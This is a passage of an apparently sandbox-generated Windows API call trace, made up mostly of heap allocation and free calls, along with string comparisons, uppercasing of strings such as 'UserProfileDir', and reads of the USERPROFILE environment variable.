hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0214.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0214.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0214.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0214.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0214.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SpSJ7tN62PCD2h Y", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0214.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pSJ7tN62PCD2h Y", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0214.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SJ7tN62PCD2h Y", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0214.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J7tN62PCD2h Y", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7tN62PCD2h Y", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tN62PCD2h Y", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0214.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N62PCD2h Y", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0214.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="62PCD2h Y", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2PCD2h Y", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PCD2h Y", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0214.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CD2h Y", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D2h Y", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0214.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0214.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0214.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0214.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0214.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0214.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0214.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0214.038] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0214.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0214.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0214.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0214.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0214.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0214.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0214.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0214.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0214.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0214.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0214.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0214.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0214.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0214.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0214.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0214.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0214.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0214.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0214.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x22) returned 0x2a69700 [0214.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0214.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SpSJ7tN62PCD2h Y", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0214.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pSJ7tN62PCD2h Y", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0214.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SJ7tN62PCD2h Y", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0214.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J7tN62PCD2h Y", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0214.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7tN62PCD2h Y", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0214.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tN62PCD2h Y", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0214.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N62PCD2h Y", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0214.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="62PCD2h Y", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0214.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2PCD2h Y", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0214.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PCD2h Y", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0214.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CD2h Y", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0214.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0214.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6220 [0214.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0214.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6220 | out: hHeap=0x2af0000) returned 1 [0214.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0214.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0214.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0214.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0214.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0214.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0214.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0214.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0214.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0214.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0214.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0214.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0214.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0214.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0214.040] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0214.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0214.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0214.040] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0214.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0214.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0214.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0214.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72258 [0214.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0214.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0214.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0214.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0214.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0214.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0214.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0214.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0214.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0214.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0214.040] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0214.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0214.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0214.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab080 [0214.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0214.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0214.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab020 [0214.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0214.041] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0214.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0214.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0214.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0214.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0214.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0214.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0214.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0214.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0214.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0214.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0214.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0214.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0214.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0214.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0214.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0214.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0214.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74ec8 [0214.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0214.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0214.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0214.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0214.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0214.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0214.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0214.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0214.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0214.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0214.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0214.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722d8 [0214.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0214.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0214.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0214.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0214.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0214.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0214.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0214.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0214.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0214.042] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0214.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0214.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0214.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab020 [0214.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0214.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0214.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab050 [0214.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0214.042] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0214.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0214.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0214.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0214.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0214.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0214.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0214.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0214.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0214.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0214.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0214.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0214.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0214.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0214.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0214.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0214.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0214.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74a50 [0214.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0214.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0214.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0214.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0214.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0214.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0214.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0214.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0214.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0214.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72228 [0214.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0214.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0214.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0214.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0214.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721a8 [0214.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0214.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0214.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0214.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab020 [0214.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0214.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0214.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0214.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0214.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0214.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0214.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0214.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0214.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0214.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0214.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0214.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0214.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0214.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0214.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0214.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0214.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0214.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0214.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0214.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0214.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0214.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0214.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0214.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0214.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0214.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0214.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0214.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0214.045] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0214.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0214.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0214.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0214.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0214.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0214.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0214.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0214.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0214.045] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0214.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0214.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0214.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0214.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0214.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0214.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0214.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0214.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0214.046] PeekMessageW (in: 